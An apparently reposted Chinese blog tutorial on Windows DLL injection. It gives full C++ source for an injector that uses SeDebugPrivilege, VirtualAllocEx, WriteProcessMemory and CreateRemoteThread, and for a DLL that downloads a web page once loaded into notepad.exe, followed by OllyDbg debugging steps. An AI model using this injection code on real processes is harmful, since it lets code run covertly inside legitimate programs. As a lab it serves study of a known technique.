2. 程式人生 > >DLL注入:用CreateRemoteThread實現DLL注入

DLL注入:用CreateRemoteThread實現DLL注入

阿新 發佈:2018-11-04

實驗環境:WINXP VS2010
功能:注入到notepad.exe程式,並從網上下一個檔案
實驗程式:
(一)myhack.dll,即要注入的dll程式

#include "windows.h"
#include "tchar.h"

#pragma comment(lib,"urlmon.lib")

#define DEF_URL (L"http://www.naver.com/index.html")
#define DEF_FILE_NAME (L"index.html")

HMODULE g_hMod = NULL;

DWORD WINAPI ThreadProc(LPVOID lParam)
{
	TCHAR szPath[_MAX_PATH] = {0,};

	if(!GetModuleFileName(g_hMod,szPath,MAX_PATH))
		return FALSE;

	TCHAR *p = _tcsrchr(szPath,'\\');
	if(!p)
		return FALSE;

	_tcscpy_s(p+1,_MAX_PATH,DEF_FILE_NAME);
	
	HRESULT hr = URLDownloadToFile(NULL,DEF_URL,szPath,0,NULL);
	if (hr != S_OK)
		return FALSE;
	else
		OutputDebugString(L"down finish!!!!");

	return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
	HANDLE hThread = NULL;
	g_hMod = (HMODULE)hinstDLL;

	switch(fdwReason)
	{
	case DLL_PROCESS_ATTACH:

		OutputDebugString(L"myhack.dll Injection!!!!");

		hThread = CreateThread(NULL,0,ThreadProc,NULL,0,NULL);

		if (hThread)
			OutputDebugString(L"down finish!!!!");

		CloseHandle(hThread);
		break;
	}
	return TRUE;
}

程式流程:
(1)當DLL被載入(DLL_PROCESS_ATTACH)時,先輸出一個除錯字串,
(2)利用CreateThread() 建立一個執行緒,建立後立即被啟用,直接呼叫ThreadProc函式
(3)該函式呼叫URLDownloadToFile() 下載指定網站的index.html檔案

(二)InjectDll.exe,即將myhack.dll注入notepad.exe的程式

// InjectDll.cpp : 定義控制檯應用程式的入口點。
//

#include "stdafx.h"
#include "windows.h"
#include "tchar.h"

BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath)
{
	HANDLE hProcess = NULL;
	HANDLE hThread = NULL;
	HMODULE hMod = NULL;
	LPVOID pRemoteBuf = NULL; //儲存dll路徑字串的起始地址
	DWORD dwBufSize = (DWORD)(_tcslen(szDllPath)+1)*sizeof(TCHAR); // dll路徑字串的大小
	LPTHREAD_START_ROUTINE pThreadProc; // 儲存LoadLibrary函式的地址


	// 使用dwPID獲取目標程序控制代碼
	if(!(hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPID)))
	{
		_tprintf(L"OpenProcess(%d) failed!!![%d]\n",dwPID,GetLastError());
		return FALSE;
	}

	// 在目標程序notepad.exe記憶體中分配szDLLName大小的記憶體
	pRemoteBuf = VirtualAllocEx(hProcess,NULL,dwBufSize,MEM_COMMIT,PAGE_READWRITE);

	// 將myhack.dll路徑寫入分配的記憶體
	WriteProcessMemory(hProcess,pRemoteBuf,(LPVOID)szDllPath,dwBufSize,NULL);

	// 獲取LoadLibraryW() API的地址
	hMod = GetModuleHandle(L"kernel32.dll");
	pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod,"LoadLibraryW");

	// 在notepad.exe中執行執行緒
	hThread = CreateRemoteThread(hProcess,NULL,0,pThreadProc,pRemoteBuf,0,NULL);

	WaitForSingleObject(hThread,INFINITE);
	CloseHandle(hThread);
	CloseHandle(hProcess);

	return TRUE;

}
// 提權函式
BOOL EnableDebugPriv() 
{ 
	HANDLE hToken;
	LUID sedebugnameValue; 
	TOKEN_PRIVILEGES tkp; 
 
	if ( ! OpenProcessToken( GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) ) 
	{
		printf("提權失敗。");
		return FALSE; 
	}
 
	if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) ) 
	{ 
		CloseHandle( hToken ); 
		printf("提權失敗。");
		return FALSE; 
	} 
	tkp.PrivilegeCount = 1; 
	tkp.Privileges[0].Luid = sedebugnameValue; 
	tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; //
	if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) ) 
	{
		printf("提權失敗。");
		CloseHandle( hToken );
	}
	else 
	{
		printf("提權成功!");
		return TRUE;
	}

}

int _tmain(int argc, _TCHAR* argv[])
{

	if (argc !=3)
	{
		_tprintf(L"USAGE: %s pid dll_path\n",argv[0]);
		return 1;
	}
	//inject dll

	EnableDebugPriv();

	if (InjectDll((DWORD)_tstol(argv[1]),argv[2]))
	
		_tprintf(L"InjectDll(\"%s\") success!!!\n",argv[2]);
	else
		_tprintf(L"InjectDll(\"%s\") failed!!!\n",argv[2]);
	
	

	/*DWORD dwPID = 0;
	LPCTSTR szDllPath = NULL;
	dwPID = 1776;
	szDllPath = L"C:\\work\\myhack.dll";
	InjectDll(dwPID,szDllPath);*/

	return 0;
}

程式流程:
(1)首先進行提權,如果不提權,OpenProcess()會報GetlastError[5]的錯誤,同時拿不到控制代碼。這是因為在xp環境下,雖然賬號是管理員,但是許可權預設沒有啟動。
(2)利用OpenProcess() 獲得目標程序的控制代碼。這裡指notepad.exe
(3)用VirtualAllocEx() 在目標程序空間分配一定的記憶體空間。用來寫入DLL的路徑
(4)用WriteProcessMemory() 將DLL路徑字串寫入剛分配的記憶體。
(5)利用GetModuleHandle() 和GetProcessAddress() 得到LoadLibrary() 的地址。用來載入DLL
(6)利用CreateRemoteThread() 使LoadLibrary()載入DLL,實現DLL的注入。

給程序提權有三種方法

除錯:

開啟記事本,OD attach ,執行;
將OD的選項->除錯設定->事件->中斷在新模組DLL處選中,則程式當載入新的DLL時就會停住;
執行命令列,輸入引數,執行InjectDll.exe程式;
在這裡插入圖片描述
則OD會彈出Executable modules視窗,發現myhack.dll被載入
在這裡插入圖片描述
雙擊來到myhack.dll 入口點附近,下斷點,接下來,將OD的中斷在新的DLL入口處關閉,執行,就可以除錯DLL程式了
在這裡插入圖片描述

具體分析一下dll流程:
(1)首先通過GetModuleFileName得到myhack.dll的完整路徑
(2)通過_tcschr() 得到’\myhack.dll’。_tcschr(szPath,’\’)表示查詢szPath字串’‘字元最後一次出現的位置,並返回\後面的字元,包括’’
在這裡插入圖片描述
在這裡插入圖片描述
接下來呼叫_tcscpy_s(p+1,_MAX_PATH,DEF_FILE_NAME)此時,p+1指向’myhack.dll’字串;

執行完後,說明這個函式實現了拷貝,但是……為啥要拷貝?
在這裡插入圖片描述
最後呼叫URLDownloadToFile() 函式實現下載。觀察引數明白了,原來拷貝函式是為了得到下載儲存的路徑的呀!
在這裡插入圖片描述

執行程式:發現注入成功了!但是遺憾的是work資料夾中並沒有下載的index.html檔案。。。原因未知。。。
在這裡插入圖片描述
用Process Explorer也能看到myhack.dll確實被注入到notepad.exe中了
在這裡插入圖片描述

相關推薦

DLL注入CreateRemoteThread實現DLL注入

實驗環境:WINXP VS2010 功能:注入到notepad.exe程式,並從網上下一個檔案 實驗程式: (一)myhack.dll,即要注入的dll程式 #include "windows.h" #include "tchar.h" #pragma comment(lib,"url

示例Android註解實現程式碼注入

前面的部落格Android中的註解中, 我們簡單描述了Android中註解的含義和用途。 除了基本的用法外,註解還可以幫助我們實現程式碼注入,達到類似IoC的效果。 本篇部落格以一個簡單的例子,記錄一下相關的內容。 通常的情況下,我們初始化介面的程式

小練習socket實現Linux和Windows之間的通信

ren argc 漏洞 markdown tex sockets acc sas -m 在日常生活中,絕大部分人使用的機器通常是windows系統,可是對於研發人員,開發、編譯等工作往往是建立在linux機器上。其實。在服務器方面,Linux、UNIX和

案例python實現翻譯小程序

luchangshan5200案例:翻譯小程序 #實現一個翻譯小程序 #1 可以查詢單詞 #2 可以自定義補充單詞解釋 #3 可以刪除某個單詞 print(‘歡迎來到大寶dayday見小詞典‘.center(30,‘-‘)) orig_dict = {‘中文‘:‘chinese‘,‘代碼‘:‘code‘,‘

類方法實現python實現一個簡單的單詞本,添加/查找/刪除單詞。

end code div keys style 成功 move print utf 1.實現一個簡單的單詞本,功能: ①添加單詞,當所添加的單詞已存在時,讓用戶知道 ②查找單詞,當查找的單詞不存在時,讓用戶知道 ③刪除單詞,當刪除的單詞不存在時,讓用戶知道 以上

基於硬體的C(C++)語言程式設計教程12函式實現2數之和

本系列文章希望探討以硬體為平臺講述C(C++)知識的一個新的途徑,改變目前大多數C語言教程僅注重C語言本身的語法規則,而脫離其應用環境的現狀。希望讀者通過本教程的學習,能夠立刻學以致用,真正將所學知識應用到專案實踐中。 開發環境:Atmel Studio 7.0 硬體平臺:Microch

練習三十二python實現:按相反的順序輸出列表的每一位值

用python實現:按相反的順序輸出列表的每一位值 1. 使用list[::-1] 1 list1 = ["one","two","three","four"] 2 for i in list1[::-1]:#list[::-1]結果為列表的反向 3 print(i) 2. 使用l

機器學習實戰nodejs實現人臉識別

機器學習實戰:用nodejs實現人臉識別   在本文中,我將向你展示如何使用face-recognition.js執行可靠的人臉檢測和識別 。 我曾經試圖找一個能夠精確識別人臉的Node.js庫,但是

實戰Python實現隨機森林

因為有Scikit-Learn這樣的庫,現在用Python實現任何機器學習演算法都非常容易。實際上,我們現在不需要任何潛在的知識來了解模型如何工作。雖然不需要了解所有細節,但瞭解模型如何訓練和預測對工作仍有幫助。比如:如果效能不如預期,我們可以診斷模型或當我們想要說服其他人使用我們的模型時,我們可以向他們解

Python每日一題第4題Python實現斐波那契數列

這是Python之禪和他朋友們在知識星球的第4題:用Python實現斐波那契數列 斐波那契數列(Fibonacci)最早由印度數學家Gopala提出,而第一個真正研究斐波那契數列的是義大利數學家 Leonardo Fibonacci,斐波那契數列的定義很簡單,用數學函式可表示為: 數列從0

Python3學習筆記(四)Python實現深度優先

這裡主要是用Python實現下深度優先的概念,由於程式碼寫得比較隨意,就沒有封裝成類,而是寫成一個函式 用一個列表做為實驗資料,模擬成二叉樹結構,用遞迴的方式不斷獲取二叉樹上的左節點,一直到左節點 序號超出列表範圍,然後迴歸獲取右節點,以此來實現深度優先。 以下是程式碼

CMU15-440 project-0Go實現一個廣播回顯的Server

最近在學習分散式系統,特定跟上了CMU15-440這門課。 寫完了Project 0 Project 0 : 是讓寫一個能夠回顯的Echo Server 要求是每一個Client傳送給Server訊息,用\n來進行分割,並將收到的資訊都返回給所有的使用者: 下面

編譯原理Yacc實現簡易計算器

要求 下載bison 下載之後解壓即可 配置環境變數 ①在系統變數Path中新增如下變數 \user\local\wbin可以在剛才解壓的資料夾裡找到 ②在系統變數中新增變數BISON_SIMPLE和BISON_HAIRY,變數值如下圖 生成.

實戰Python實現隨機森林!

因為有 Scikit-Learn 這樣的庫,現在用Python實現任何機器學習演算法都非常容易。實際上,我們現在不需要任何潛在的知識來了解模型如何工作。雖然不需要了解所有細節,但瞭解模型如何訓練和預測對工作仍有幫助。比如:如果效能不如預期,我們可以診斷模型或當我們想要說服其他人使用我們的模型時,我們

前端演算法js實現楊輝三角(帕斯卡三角形)程式設計

楊輝三角,是二項式係數在三角形中的一種幾何排列,在中國南宋數學家楊輝1261年所著的《詳解九章演算法》一書中出現。 在歐洲,帕斯卡(1623-1662)在1654年發現這一規律,所以這個表又叫做帕斯卡三角形。 帕斯卡的發現比楊輝要遲393年,比賈憲遲600年。

WebSocket WebSocket實現推送你必須考慮的幾個問題

目錄: 1.WebSocket簡介 2.專案背景、硬體環境及客戶端支援 本專案通過WebSocket實現同時線上使用者量幾千的推送伺服器(可內網執行)。且可實時檢視使用者線上狀態。 伺服器:centos 6.5、tomcat 7 客戶

Android實戰技巧TextView實現Rich Text---在同一個TextView中設定不同的字型風格

背景介紹 在開發應用過程中經常會遇到顯示一些不同的字型風格的資訊猶如預設的LockScreen上面的時間和充電資訊。對於類似的情況,可能第一反應就是用不同的多個TextView來實現,對於每個TextView設定不同的字型風格以滿足需求。 這裡推薦的做法是使用android

識別MNIST資料集之(二)Python實現神經網路

在這篇文章當中,我們將會用根據MNIST的資料集,跟大家介紹神經網路進行分類的基本原理和方法。 1.神經網路的正向計算 如果我們把神經網路當作一個黑盒來看,它的結構大概是這樣的: 輸入(層):一張圖片 計算過程 : 神經網路 輸出 (層): 這張圖

一道js程式設計題js實現棧的出棧,入棧等操作

這是4月份快手前端實習筆試的一道程式設計題,要求是實現: 入棧:NumberStack.push(num) 、出棧:NumberStack.pop() 、找出棧中第n大的數:NumberStack.max(n) //下面是我的版本 function Num

機器學習實驗(四)tensorflow實現卷積神經網路識別人類活動

在近幾年,越來越多的使用者在智慧手機上安裝加速度感測器等一些裝置,這就為做一些應用需要收集相關的資料提供了方便。人類活動識別(human activity recognition (HAR))是其中的一個應用。對於HAR,有很多的方法可以去嘗試,方法的performance很大程度上依賴於特徵工程。傳統的機